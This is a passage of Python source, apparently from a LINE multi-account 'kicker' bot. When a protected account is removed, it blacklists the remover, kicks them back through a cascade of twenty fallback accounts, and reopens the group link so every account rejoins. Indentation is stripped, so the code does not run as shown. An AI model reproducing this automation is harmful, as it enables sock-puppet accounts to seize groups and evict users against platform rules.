line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
pass
return
if Imid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
pass
return
if ga1 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
pass
return
if ga2 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
pass
return
if ga3 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
pass
return
if ga4 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
